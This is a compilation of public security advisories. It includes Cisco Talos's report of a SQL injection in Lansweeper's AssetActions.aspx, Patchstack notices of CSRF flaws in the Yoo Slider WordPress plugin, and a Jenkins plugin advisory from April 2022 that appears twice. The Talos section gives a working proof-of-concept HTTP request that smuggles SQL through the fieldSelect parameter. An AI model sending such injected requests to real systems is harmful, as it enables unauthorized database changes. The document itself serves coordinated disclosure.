An SQL injection vulnerability exists in the AssetActions.aspx functionality of Lansweeper lansweeper 9.1.20.2. A specially-crafted HTTP request can cause SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**Summary**

An SQL injection vulnerability exists in the AssetActions.aspx functionality of Lansweeper lansweeper 9.1.20.2. A specially crafted HTTP request can cause SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**Tested Versions**

Lansweeper lansweeper 9.1.20.2

**Product URLs**

lansweeper - https://www.lansweeper.com/

**CVSSv3 Score**

6.6 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L

**CWE**

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Details**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management and compliance and audit purposes.

An exploitable SQL Injection vulnerability is related to an `fieldSelect` parameter passed to : `/AssetActions.aspx` script. Let us take a close look at the vulnerable source code :

    LS\WS\AssetActions.cs
    
    Line 743	else if (page.IsPostBack && current.Request["action"] == "assetfieldschange")
    Line 744	{
    Line 745		User.Current().CheckRoleRedirect(Permission.EditData);
    Line 746		General.ValidateCsrf();
    Line 747		JsReturnObject jsReturnObject8 = new JsReturnObject();
    Line 748		try
    Line 749		{
    Line 750			string[] array9 = current.Request["fieldselect"].Split(',');
    (...)
    Line 828					foreach (string text38 in array9)
    Line 828				     {    
    (...)
    Line 919           				default:
    Line 920                              DB.ExecuteDataset("UPDATE tblAssetCustom SET " + text38 + " = @data, Lastchanged = GETDATE() WHERE AssetID=@aid", DB.NewDBParameter("@data", text41), DB.NewDBParameter("@aid", item10.Key));    
    

`fieldSelect` parameter is provided by the user and is not sanitized at all. In `line 920` we can notice that `fieldSelect` is concatenated with the SQL query string in a regular way which leads to SQL injection. To trigger this vulnerability an attacker must be authenticated and have proper permissions.

**Exploit Proof of Concept**

PoC presents abuse of descibed SQL Injection to set `@@version` varabile value to `Comments` field of all assets

REQUEST

    POST /AssetActions.aspx?action=assetfieldschange HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: */*
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 357
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/Assets.aspx
    Cookie: UserSettings=language=1; custauth=username=hacker&userdomain=; ASP.NET_SessionId=urnwlqmv1l5lmopoadrtppoe; __RequestVerificationToken_Lw__=murmHbbVXPpH1R3EJDgF1WQsZis+Gb6CAsLBYb/j9OSuLM7CD40h4xXqxvCgfuqmOaBtpmsC0k3x3MkQjRQ3HxsbCX8IuNomvCcIQQGKG+90p/DAA6+KM/DvgT9TnlopUM7bszIzCpwDZIsFkAQ7pGzCBKJjAHA4rfFqh3KhEaY=
    
    __VIEWSTATE=&fieldSelect=Comments=@@version--&xxComments%3d@@version--=Magic_domain&ChangeField(s)={"8":"desktop-qkvr1oa"}&chksm=5198068737&__RequestVerificationToken=%2BG2NW0MNWwOSh3YMz0Dx6IA5tYOFGu2L%2BeYifOsekA7QXd0jZzc7o%2B9jfoWfs%2B1OeJZD7K5smTyL%2Fur4JLNseWxkL64BD%2FDxGAxXx4GWMtXbSQhM9GY2M5P5q0o0%2Bd5KCeivqEcUIkf6O1TpV7RjIoza7%2BTnLhiW7SLyYUSQ4Ew%3D
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/html; charset=utf-8
    Expires: -1
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Fri, 07 Jan 2022 10:01:30 GMT
    Connection: close
    Content-Length: 189
    
    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["Comments=@@version--","Magic_domain"]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**Timeline**

2022-01-11 - Vendor disclosure  
2022-02-21 - Vendor patched  
2022-02-28 - Public Release

Discovered by Marcin "Icewall" Noga of Cisco Talos.

CVE-2022-21210: TALOS-2022-1444 || Cisco Talos Intelligence Group

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)

An issue was discovered in ThoughtWorks GoCD before 21.3.0. An attacker with privileges to create a new pipeline on a GoCD server can abuse a command-line injection in the Git URL "Test Connection" feature to execute arbitrary code.

CVE-2021-43286: Releases - Version notes | GoCD

Cross-Site Request Forgery (CSRF) vulnerability in Yooslider Yoo Slider <= 2.0.0 on WordPress allows attackers to import templates.

**yoo-slider**

**Software**

**Yoo Slider**

**Vulnerable Versions**

**<= 2.0.0**

**Fixed in version**

**2.1.0**

**CVE**

**CVE-2022-27847**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-04-11**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to Template Import discovered by Ex.Mi (Patchstack) in WordPress Yoo Slider plugin (versions <= 2.0.0).**

**Solution**

**Update the WordPress Yoo Slider plugin to the latest available version (at least 2.1.0).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-27847: WordPress Yoo Slider plugin <= 2.0.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to Template Import - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Yooslider Yoo Slider <= 2.0.0 on WordPress allows attackers to create or modify slider.

**yoo-slider**

**Software**

**Yoo Slider**

**Vulnerable Versions**

**<= 2.0.0**

**Fixed in version**

**2.1.0**

**CVE**

**CVE-2022-27846**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-04-11**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to Slider Creation / Modification discovered by Ex.Mi (Patchstack) in WordPress Yoo Slider plugin (versions <= 2.0.0).**

**Solution**

**Update the WordPress Yoo Slider plugin to the latest available version (at least 2.1.0).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-27846: WordPress Yoo Slider plugin <= 2.0.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to Slider Creation / Modification - Patchstack

Jenkins Subversion Plugin 2.15.3 and earlier does not escape the name and description of List Subversion tags (and more) parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Credentials Plugin
*   CVS Plugin
*   Extended Choice Parameter Plugin
*   Gerrit Trigger Plugin
*   Git Parameter Plugin
*   Google Compute Engine Plugin
*   Jira Plugin
*   Job Generator Plugin
*   Mask Passwords Plugin
*   Node and Label parameter Plugin
*   Pipeline: Deprecated Groovy Libraries Plugin
*   promoted builds Plugin
*   Publish Over FTP Plugin
*   Subversion Plugin

**Descriptions****Stored XSS vulnerabilities in multiple plugins providing additional parameter types**

**SECURITY-2617 / CVE-2022-29036 (Credentials), CVE-2022-29037 (CVS), CVE-2022-29038 (Extended Choice Parameter), CVE-2022-29039 (Gerrit Trigger), CVE-2022-29040 (Git Parameter), CVE-2022-29041 (Jira), CVE-2022-29042 (Job Generator), CVE-2022-29043 (Mask Passwords), CVE-2022-29044 (Node and Label Parameter), CVE-2022-29045 (promoted builds), CVE-2022-29046 (Subversion)**

Multiple plugins do not escape the name and description of the parameter types they provide:

*   Credentials Plugin 1111.v35a\_307992395 and earlier (SECURITY-2690 / CVE-2022-29036)
    
*   CVS Plugin 2.19 and earlier (SECURITY-2700 / CVE-2022-29037)
    
*   Extended Choice Parameter Plugin 346.vd87693c5a\_86c and earlier (SECURITY-2704 / CVE-2022-29038)
    
*   Gerrit Trigger Plugin 2.35.2 and earlier (SECURITY-2703 / CVE-2022-29039)
    
*   Git Parameter Plugin 0.9.15 and earlier (SECURITY-2699 / CVE-2022-29040)
    
*   Jira Plugin 3.7 and earlier (SECURITY-2691 / CVE-2022-29041)
    
*   Job Generator 1.22 and earlier (SECURITY-2263 / CVE-2022-29042)
    
*   Mask Passwords Plugin 3.0 and earlier (SECURITY-2701 / CVE-2022-29043)
    
*   Node and Label parameter Plugin 1.10.3 and earlier (SECURITY-2702 / CVE-2022-29044)
    
*   promoted builds Plugin 873.v6149db\_d64130 and earlier (SECURITY-2692 / CVE-2022-29045)
    
*   Subversion Plugin 2.15.3 and earlier (SECURITY-2698 / CVE-2022-29046)
    

This results in stored cross-site scripting (XSS) vulnerabilities exploitable by attackers with Item/Configure permission.

Exploitation of these vulnerabilities requires that parameters are listed on another page, like the "Build With Parameters" and "Parameters" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the "Build With Parameters" and "Parameters" pages since 2.44 and LTS 2.32.2 as part of the SECURITY-353 / CVE-2017-2601 fix. Additionally, the following plugins have been updated to list parameters in a way that prevents exploitation by default.

*   Maven Release Plugin 0.16.3 (SECURITY-2669)
    
*   Pipeline: Build Step Plugin 2.17 and 2.15.2 (SECURITY-2611)
    
*   Pipeline: Input Step Plugin 447.v95e5a\_6e3502a\_ and 2.12.1 (SECURITY-2674)
    
*   promoted builds Plugin 876.v99d29788b\_36b\_ and 3.10.1 (SECURITY-2670)
    
*   Rebuilder Plugin 1.33.1 (SECURITY-2671)
    
*   Release Plugin 2.14 (SECURITY-2672)
    

Older releases of these plugins allow exploitation of the vulnerabilities listed above.

As of publication of this advisory, the following plugins have not yet been updated to list parameters in a way that prevents exploitation of these vulnerabilities:

*   Coordinator Plugin (SECURITY-2668)
    
*   Show Build Parameters Plugin (SECURITY-2325)
    
*   Unleash Maven Plugin (SECURITY-2673)
    

These are not vulnerabilities in these plugins. Only plugins defining parameter types can be considered to be vulnerable to this issue.

Some plugins both define parameter types and implement a page listing parameters, so they can appear in multiple lists and may have both a security fix and a security hardening applied.

The following plugins have been updated to escape the name and description of the parameter types they provide in the versions specified:

*   Credentials Plugin 1112.vc87b\_7a\_3597f6, 1087.1089.v2f1b\_9a\_b\_040e4, 1074.1076.v39c30cecb\_0e2, and 2.6.1.1
    
*   CVS Plugin 2.19.1
    
*   Gerrit Trigger Plugin 2.35.3
    
*   Git Parameter Plugin 0.9.16
    
*   Jira Plugin 3.7.1 and 3.6.1
    
*   Mask Passwords Plugin 3.1
    
*   Node and Label parameter Plugin 1.10.3.1
    
*   promoted builds Plugin 876.v99d29788b\_36b\_ and 3.10.1
    
*   Subversion Plugin 2.15.4
    

As of publication of this advisory, there is no fix available for the following plugins:

*   Extended Choice Parameter Plugin (SECURITY-2704 / CVE-2022-29038)
    
*   Job Generator (SECURITY-2263 / CVE-2022-29042)
    

**Untrusted users can modify some Pipeline libraries in Pipeline: Deprecated Groovy Libraries Plugin**

**SECURITY-1951 / CVE-2022-29047**

Multibranch Pipelines by default limit who can change the Pipeline definition from the Jenkinsfile. This is useful for SCMs like GitHub: Jenkins can build content from users without commit access, but who can submit pull requests, without granting them the ability to modify the Pipeline definition. In that case, Jenkins will just use the Pipeline definition in the pull request’s destination branch instead.

In Pipeline: Deprecated Groovy Libraries Plugin 564.ve62a\_4eb\_b\_e039 and earlier the same protection does not apply to uses of the library step with a retriever argument pointing to a library in the current build’s repository and branch (e.g., library(…, retriever: legacySCM(scm))). This allows attackers able to submit pull requests (or equivalent), but not able to commit directly to the configured SCM, to effectively change the Pipeline behavior by changing the library behavior in their pull request, even if the Pipeline is configured to not trust them.

Pipeline: Deprecated Groovy Libraries Plugin 566.vd0a\_a\_3334a\_555 and 2.21.3 aborts library retrieval if the library would be retrieved from the same repository and revision as the current build, and the revision being built is untrusted.

**CSRF vulnerability in Subversion Plugin**

**SECURITY-2075 / CVE-2022-29048**

Subversion Plugin 2.15.3 and earlier does not require POST requests for several form validation methods, resulting in cross-site request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers to connect to an attacker-specified URL.

Subversion Plugin 2.15.4 requires POST requests for the affected form validation methods.

**Promotion names in promoted builds Plugin are not validated when using Job DSL**

**SECURITY-2655 / CVE-2022-29049**

promoted builds Plugin provides dedicated support for defining promotions using Job DSL Plugin.

promoted builds Plugin 873.v6149db\_d64130 and earlier does not validate the names of promotions defined in Job DSL. This allows attackers with Job/Configure permission to create a promotion with an unsafe name. As a result, the promotion name could be used for cross-site scripting (XSS) or to replace other config.xml files.

promoted builds Plugin 876.v99d29788b\_36b\_ and 3.10.1 validates the name of promotions.

**CSRF vulnerability and missing permission checks in Publish Over FTP Plugin**

**SECURITY-2321 / CVE-2022-29050 (CSRF), CVE-2022-29051 (missing permission check)**

Publish Over FTP Plugin 1.16 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an FTP server using attacker-specified credentials.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Publish Over FTP Plugin 1.17 requires POST requests and appropriate permissions for the affected form validation methods.

**Private key stored in plain text by Google Compute Engine Plugin**

**SECURITY-2045 / CVE-2022-29052**

Google Compute Engine Plugin 4.3.8 and earlier stores private keys unencrypted in cloud agent config.xml files on the Jenkins controller as part of its configuration.

These private keys can be viewed by users with Agent/Extended Read permission or access to the Jenkins controller file system.

Google Compute Engine Plugin 4.3.9 stores private keys encrypted.

**Severity**

*   SECURITY-1951: High
*   SECURITY-2045: Medium
*   SECURITY-2075: Medium
*   SECURITY-2321: Medium
*   SECURITY-2617: High
*   SECURITY-2655: High

**Affected Versions**

*   **Credentials Plugin** up to and including 1111.v35a\_307992395
*   **CVS Plugin** up to and including 2.19
*   **Extended Choice Parameter Plugin** up to and including 346.vd87693c5a\_86c
*   **Gerrit Trigger Plugin** up to and including 2.35.2
*   **Git Parameter Plugin** up to and including 0.9.15
*   **Google Compute Engine Plugin** up to and including 4.3.8
*   **Jira Plugin** up to and including 3.7
*   **Job Generator Plugin** up to and including 1.22
*   **Mask Passwords Plugin** up to and including 3.0
*   **Node and Label parameter Plugin** up to and including 1.10.3
*   **Pipeline: Deprecated Groovy Libraries Plugin** up to and including 564.ve62a\_4eb\_b\_e039
*   **promoted builds Plugin** up to and including 873.v6149db\_d64130
*   **Publish Over FTP Plugin** up to and including 1.16
*   **Subversion Plugin** up to and including 2.15.3

**Fix**

*   **Credentials Plugin** should be updated to version 1112.vc87b\_7a\_3597f6, 1087.1089.v2f1b\_9a\_b\_040e4, 1074.1076.v39c30cecb\_0e2, or 2.6.1.1
*   **CVS Plugin** should be updated to version 2.19.1
*   **Gerrit Trigger Plugin** should be updated to version 2.35.3
*   **Git Parameter Plugin** should be updated to version 0.9.16
*   **Google Compute Engine Plugin** should be updated to version 4.3.9
*   **Jira Plugin** should be updated to version 3.7.1 or 3.6.1
*   **Mask Passwords Plugin** should be updated to version 3.1
*   **Node and Label parameter Plugin** should be updated to version 1.10.3.1
*   **Pipeline: Deprecated Groovy Libraries Plugin** should be updated to version 566.vd0a\_a\_3334a\_555 or 2.21.3
*   **promoted builds Plugin** should be updated to version 876.v99d29788b\_36b\_ or 3.10.1
*   **Publish Over FTP Plugin** should be updated to version 1.17
*   **Subversion Plugin** should be updated to version 2.15.4

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Extended Choice Parameter Plugin
*   Job Generator Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2045
*   **James Nord, CloudBees, Inc. and Daniel Beck, CloudBees, Inc.** for SECURITY-2075
*   **James Nord, CloudBees, Inc. and Jesse Glick, CloudBees, Inc.** for SECURITY-1951
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2655
*   **Kevin Guerroudj, CloudBees, Inc., Wadeck Follonier, CloudBees, Inc., and Daniel Beck, CloudBees, Inc.** for SECURITY-2617
*   **Kevin Guerroudj, Justin Philip, Marc Heyries** for SECURITY-2321

CVE-2022-29046: Jenkins Security Advisory 2022-04-12

A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Plugin 2.15.3 and earlier allows attackers to connect to an attacker-specified URL.

CVE-2022-29048: Jenkins Security Advisory 2022-04-12

Jenkins Pipeline: Shared Groovy Libraries Plugin 564.ve62a_4eb_b_e039 and earlier, except 2.21.3, allows attackers able to submit pull requests (or equivalent), but not able to commit directly to the configured SCM, to effectively change the Pipeline behavior by changing the definition of a dynamically retrieved library in their pull request, even if the Pipeline is configured to not trust them.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Credentials Plugin
*   CVS Plugin
*   Extended Choice Parameter Plugin
*   Gerrit Trigger Plugin
*   Git Parameter Plugin
*   Google Compute Engine Plugin
*   Jira Plugin
*   Job Generator Plugin
*   Mask Passwords Plugin
*   Node and Label parameter Plugin
*   Pipeline: Shared Groovy Libraries Plugin
*   promoted builds Plugin
*   Publish Over FTP Plugin
*   Subversion Plugin

**Descriptions****Stored XSS vulnerabilities in multiple plugins providing additional parameter types**

**SECURITY-2617 / CVE-2022-29036 (Credentials), CVE-2022-29037 (CVS), CVE-2022-29038 (Extended Choice Parameter), CVE-2022-29039 (Gerrit Trigger), CVE-2022-29040 (Git Parameter), CVE-2022-29041 (Jira), CVE-2022-29042 (Job Generator), CVE-2022-29043 (Mask Passwords), CVE-2022-29044 (Node and Label Parameter), CVE-2022-29045 (promoted builds), CVE-2022-29046 (Subversion)**

Multiple plugins do not escape the name and description of the parameter types they provide:

*   Credentials Plugin 1111.v35a\_307992395 and earlier (SECURITY-2690 / CVE-2022-29036)
    
*   CVS Plugin 2.19 and earlier (SECURITY-2700 / CVE-2022-29037)
    
*   Extended Choice Parameter Plugin 346.vd87693c5a\_86c and earlier (SECURITY-2704 / CVE-2022-29038)
    
*   Gerrit Trigger Plugin 2.35.2 and earlier (SECURITY-2703 / CVE-2022-29039)
    
*   Git Parameter Plugin 0.9.15 and earlier (SECURITY-2699 / CVE-2022-29040)
    
*   Jira Plugin 3.7 and earlier (SECURITY-2691 / CVE-2022-29041)
    
*   Job Generator 1.22 and earlier (SECURITY-2263 / CVE-2022-29042)
    
*   Mask Passwords Plugin 3.0 and earlier (SECURITY-2701 / CVE-2022-29043)
    
*   Node and Label parameter Plugin 1.10.3 and earlier (SECURITY-2702 / CVE-2022-29044)
    
*   promoted builds Plugin 873.v6149db\_d64130 and earlier (SECURITY-2692 / CVE-2022-29045)
    
*   Subversion Plugin 2.15.3 and earlier (SECURITY-2698 / CVE-2022-29046)
    

This results in stored cross-site scripting (XSS) vulnerabilities exploitable by attackers with Item/Configure permission.

Exploitation of these vulnerabilities requires that parameters are listed on another page, like the "Build With Parameters" and "Parameters" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the "Build With Parameters" and "Parameters" pages since 2.44 and LTS 2.32.2 as part of the SECURITY-353 / CVE-2017-2601 fix. Additionally, the following plugins have been updated to list parameters in a way that prevents exploitation by default.

*   Maven Release Plugin 0.16.3 (SECURITY-2669)
    
*   Pipeline: Build Step Plugin 2.17 and 2.15.2 (SECURITY-2611)
    
*   Pipeline: Input Step Plugin 447.v95e5a\_6e3502a\_ and 2.12.1 (SECURITY-2674)
    
*   promoted builds Plugin 876.v99d29788b\_36b\_ and 3.10.1 (SECURITY-2670)
    
*   Rebuilder Plugin 1.33.1 (SECURITY-2671)
    
*   Release Plugin 2.14 (SECURITY-2672)
    

Older releases of these plugins allow exploitation of the vulnerabilities listed above.

As of publication of this advisory, the following plugins have not yet been updated to list parameters in a way that prevents exploitation of these vulnerabilities:

*   Coordinator Plugin (SECURITY-2668)
    
*   Show Build Parameters Plugin (SECURITY-2325)
    
*   Unleash Maven Plugin (SECURITY-2673)
    

These are not vulnerabilities in these plugins. Only plugins defining parameter types can be considered to be vulnerable to this issue.

Note

Some plugins both define parameter types and implement a page listing parameters, so they can appear in multiple lists and may have both a security fix and a security hardening applied.

The following plugins have been updated to escape the name and description of the parameter types they provide in the versions specified:

*   Credentials Plugin 1112.vc87b\_7a\_3597f6, 1087.1089.v2f1b\_9a\_b\_040e4, 1074.1076.v39c30cecb\_0e2, and 2.6.1.1
    
*   CVS Plugin 2.19.1
    
*   Gerrit Trigger Plugin 2.35.3
    
*   Git Parameter Plugin 0.9.16
    
*   Jira Plugin 3.7.1 and 3.6.1
    
*   Mask Passwords Plugin 3.1
    
*   Node and Label parameter Plugin 1.10.3.1
    
*   promoted builds Plugin 876.v99d29788b\_36b\_ and 3.10.1
    
*   Subversion Plugin 2.15.4
    

As of publication of this advisory, there is no fix available for the following plugins:

*   Extended Choice Parameter Plugin (SECURITY-2704 / CVE-2022-29038)
    
*   Job Generator (SECURITY-2263 / CVE-2022-29042)
    

**Untrusted users can modify some Pipeline libraries in Pipeline: Shared Groovy Libraries Plugin**

**SECURITY-1951 / CVE-2022-29047**

Multibranch Pipelines by default limit who can change the Pipeline definition from the Jenkinsfile. This is useful for SCMs like GitHub: Jenkins can build content from users without commit access, but who can submit pull requests, without granting them the ability to modify the Pipeline definition. In that case, Jenkins will just use the Pipeline definition in the pull request’s destination branch instead.

In Pipeline: Shared Groovy Libraries Plugin 564.ve62a\_4eb\_b\_e039 and earlier the same protection does not apply to uses of the `library` step with a `retriever` argument pointing to a library in the current build’s repository and branch (e.g., `library(…, retriever: legacySCM(scm))`). This allows attackers able to submit pull requests (or equivalent), but not able to commit directly to the configured SCM, to effectively change the Pipeline behavior by changing the library behavior in their pull request, even if the Pipeline is configured to not trust them.

Pipeline: Shared Groovy Libraries Plugin 566.vd0a\_a\_3334a\_555 and 2.21.3 aborts library retrieval if the library would be retrieved from the same repository and revision as the current build, and the revision being built is untrusted.

**CSRF vulnerability in Subversion Plugin**

**SECURITY-2075 / CVE-2022-29048**

Subversion Plugin 2.15.3 and earlier does not require POST requests for several form validation methods, resulting in cross-site request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers to connect to an attacker-specified URL.

Subversion Plugin 2.15.4 requires POST requests for the affected form validation methods.

**Promotion names in promoted builds Plugin are not validated when using Job DSL**

**SECURITY-2655 / CVE-2022-29049**

promoted builds Plugin provides dedicated support for defining promotions using Job DSL Plugin.

promoted builds Plugin 873.v6149db\_d64130 and earlier does not validate the names of promotions defined in Job DSL. This allows attackers with Job/Configure permission to create a promotion with an unsafe name. As a result, the promotion name could be used for cross-site scripting (XSS) or to replace other `config.xml` files.

promoted builds Plugin 876.v99d29788b\_36b\_ and 3.10.1 validates the name of promotions.

**CSRF vulnerability and missing permission checks in Publish Over FTP Plugin**

**SECURITY-2321 / CVE-2022-29050 (CSRF), CVE-2022-29051 (missing permission check)**

Publish Over FTP Plugin 1.16 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an FTP server using attacker-specified credentials.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Publish Over FTP Plugin 1.17 requires POST requests and appropriate permissions for the affected form validation methods.

**Private key stored in plain text by Google Compute Engine Plugin**

**SECURITY-2045 / CVE-2022-29052**

Google Compute Engine Plugin 4.3.8 and earlier stores private keys unencrypted in cloud agent `config.xml` files on the Jenkins controller as part of its configuration.

These private keys can be viewed by users with Agent/Extended Read permission or access to the Jenkins controller file system.

Google Compute Engine Plugin 4.3.9 stores private keys encrypted.

**Severity**

*   SECURITY-1951: High
*   SECURITY-2045: Medium
*   SECURITY-2075: Medium
*   SECURITY-2321: Medium
*   SECURITY-2617: High
*   SECURITY-2655: High

**Affected Versions**

*   **Credentials Plugin** up to and including 1111.v35a\_307992395
*   **CVS Plugin** up to and including 2.19
*   **Extended Choice Parameter Plugin** up to and including 346.vd87693c5a\_86c
*   **Gerrit Trigger Plugin** up to and including 2.35.2
*   **Git Parameter Plugin** up to and including 0.9.15
*   **Google Compute Engine Plugin** up to and including 4.3.8
*   **Jira Plugin** up to and including 3.7
*   **Job Generator Plugin** up to and including 1.22
*   **Mask Passwords Plugin** up to and including 3.0
*   **Node and Label parameter Plugin** up to and including 1.10.3
*   **Pipeline: Shared Groovy Libraries Plugin** up to and including 564.ve62a\_4eb\_b\_e039
*   **promoted builds Plugin** up to and including 873.v6149db\_d64130
*   **Publish Over FTP Plugin** up to and including 1.16
*   **Subversion Plugin** up to and including 2.15.3

**Fix**

*   **Credentials Plugin** should be updated to version 1112.vc87b\_7a\_3597f6, 1087.1089.v2f1b\_9a\_b\_040e4, 1074.1076.v39c30cecb\_0e2, or 2.6.1.1
*   **CVS Plugin** should be updated to version 2.19.1
*   **Gerrit Trigger Plugin** should be updated to version 2.35.3
*   **Git Parameter Plugin** should be updated to version 0.9.16
*   **Google Compute Engine Plugin** should be updated to version 4.3.9
*   **Jira Plugin** should be updated to version 3.7.1 or 3.6.1
*   **Mask Passwords Plugin** should be updated to version 3.1
*   **Node and Label parameter Plugin** should be updated to version 1.10.3.1
*   **Pipeline: Shared Groovy Libraries Plugin** should be updated to version 566.vd0a\_a\_3334a\_555 or 2.21.3
*   **promoted builds Plugin** should be updated to version 876.v99d29788b\_36b\_ or 3.10.1
*   **Publish Over FTP Plugin** should be updated to version 1.17
*   **Subversion Plugin** should be updated to version 2.15.4

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Extended Choice Parameter Plugin
*   Job Generator Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2045
*   **James Nord, CloudBees, Inc. and Daniel Beck, CloudBees, Inc.** for SECURITY-2075
*   **James Nord, CloudBees, Inc. and Jesse Glick, CloudBees, Inc.** for SECURITY-1951
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2655
*   **Kevin Guerroudj, CloudBees, Inc., Wadeck Follonier, CloudBees, Inc., and Daniel Beck, CloudBees, Inc.** for SECURITY-2617
*   **Kevin Guerroudj, Justin Philip, Marc Heyries** for SECURITY-2321

CVE-2022-29047: Jenkins Security Advisory 2022-04-12

Jenkins Google Compute Engine Plugin 4.3.8 and earlier stores private keys unencrypted in cloud agent config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

CVE-2022-29052: Jenkins Security Advisory 2022-04-12

Jenkins promoted builds Plugin 873.v6149db_d64130 and earlier, except 3.10.1, does not validate the names of promotions defined in Job DSL, allowing attackers with Job/Configure permission to create a promotion with an unsafe name.

Tag

#csrf